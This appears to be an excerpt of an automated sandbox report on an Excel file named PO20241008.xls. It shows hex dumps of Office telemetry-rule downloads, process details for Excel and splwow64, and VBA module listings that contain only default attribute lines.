              2024-10-08 13:38:33 UTC16384INData Raw: 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20
              Data Ascii: </R> </O> </F> <F T="6"> <O T="AND"> <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R>
              2024-10-08 13:38:33 UTC16384INData Raw: 74 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20
              Data Ascii: tVideo"> <C> <S T="25" /> </C> </C> <C T="U32" I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C>
              2024-10-08 13:38:33 UTC16384INData Raw: 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 39 30 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20
              Data Ascii: > <S T="1" /> </T></R><$!#>10907v0+<?xml version="1.0" encoding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100"
              2024-10-08 13:38:33 UTC16384INData Raw: 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 54 49 20 54 3d 22 31 22 20 49 3d 22 44 61 69 6c 79 22 20 2f 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 32 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d
              Data Ascii: a="PSU" xmlns=""> <S> <TI T="1" I="Daily" /> <A T="2" E="TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V=
              2024-10-08 13:38:33 UTC16384INData Raw: 20 20 20 3c 55 54 53 20 54 3d 22 35 22 20 49 64 3d 22 62 75 6b 30 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20
              Data Ascii: <UTS T="5" Id="buk0m" /> <F T="6"> <O T="EQ"> <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L>
              2024-10-08 13:38:33 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 31 30 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f
              Data Ascii: R> <V V="4" T="U32" /> </R> </O> </F> <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </
              2024-10-08 13:38:33 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d
              Data Ascii: <L> <O T="EQ"> <L> <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L>


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.66544113.107.246.604432436C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              TimestampBytes transferredDirectionData
              2024-10-08 13:38:37 UTC207OUTGET /rules/rule120603v8s19.xml HTTP/1.1
              Connection: Keep-Alive
              Accept-Encoding: gzip
              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
              Host: otelrules.azureedge.net
              2024-10-08 13:38:37 UTC563INHTTP/1.1 200 OK
              Date: Tue, 08 Oct 2024 13:38:37 GMT
              Content-Type: text/xml
              Content-Length: 2128
              Connection: close
              Vary: Accept-Encoding
              Vary: Accept-Encoding
              Vary: Accept-Encoding
              Vary: Accept-Encoding
              Cache-Control: public, max-age=604800, immutable
              Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
              ETag: "0x8DC582BA41F3C62"
              x-ms-request-id: 63f356ab-501e-0029-76b6-16d0b8000000
              x-ms-version: 2018-03-28
              x-azure-ref: 20241008T133837Z-1657d5bbd48xlwdx82gahegw40000000059000000000c1r3
              x-fd-int-roxy-purgeid: 0
              X-Cache: TCP_HIT
              Accept-Ranges: bytes
              2024-10-08 13:38:37 UTC2128INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 33 22 20 56 3d 22 38 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 64 64 69 74 69 6f 6e 61 6c 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 45 3d 22 66 61 6c 73 65 22 20 44 4c 3d
              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120603" V="8" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAdditional" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" E="false" DL=


              Statistics

              CPU Usage

              Click to jump to process

              Memory Usage

              Click to jump to process

              High Level Behavior Distribution

              Click to dive into process behavior distribution

              Behavior

              Click to jump to process

              System Behavior

              General

              Target ID:0
              Start time:09:37:22
              Start date:08/10/2024
              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
              Imagebase:0x540000
              File size:53'161'064 bytes
              MD5 hash:4A871771235598812032C822E6F68F19
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              General

              Target ID:5
              Start time:09:38:46
              Start date:08/10/2024
              Path:C:\Windows\splwow64.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\splwow64.exe 12288
              Imagebase:0x7ff7cfff0000
              File size:163'840 bytes
              MD5 hash:77DE7761B037061C7C112FD3C5B91E73
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:false

              General

              Target ID:8
              Start time:09:39:07
              Start date:08/10/2024
              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
              Wow64 process (32bit):true
              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO20241008.xls"
              Imagebase:0x7ff7934f0000
              File size:53'161'064 bytes
              MD5 hash:4A871771235598812032C822E6F68F19
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Disassembly

              Code Analysis

              Call Graph

              • Entrypoint
              • Decryption Function
              • Executed
              • Not Executed
              • Show Help
              callgraph 1 Error: Graph is empty

              Module: Sheet1

              Declaration
              LineContent
              1

              Attribute VB_Name = "Sheet1"

              2

              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

              3

              Attribute VB_GlobalNameSpace = False

              4

              Attribute VB_Creatable = False

              5

              Attribute VB_PredeclaredId = True

              6

              Attribute VB_Exposed = True

              7

              Attribute VB_TemplateDerived = False

              8

              Attribute VB_Customizable = True

              Module: Sheet2

              Declaration
              LineContent
              1

              Attribute VB_Name = "Sheet2"

              2

              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

              3

              Attribute VB_GlobalNameSpace = False

              4

              Attribute VB_Creatable = False

              5

              Attribute VB_PredeclaredId = True

              6

              Attribute VB_Exposed = True

              7

              Attribute VB_TemplateDerived = False

              8

              Attribute VB_Customizable = True

              Module: Sheet3

              Declaration
              LineContent
              1

              Attribute VB_Name = "Sheet3"

              2

              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

              3

              Attribute VB_GlobalNameSpace = False

              4

              Attribute VB_Creatable = False

              5

              Attribute VB_PredeclaredId = True

              6

              Attribute VB_Exposed = True

              7

              Attribute VB_TemplateDerived = False

              8

              Attribute VB_Customizable = True

              Module: ThisWorkbook

              Declaration
              LineContent
              1

              Attribute VB_Name = "ThisWorkbook"

              2

              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

              3

              Attribute VB_GlobalNameSpace = False

              4

              Attribute VB_Creatable = False

              5

              Attribute VB_PredeclaredId = True

              6

              Attribute VB_Exposed = True

              7

              Attribute VB_TemplateDerived = False

              8

              Attribute VB_Customizable = True

              Reset < >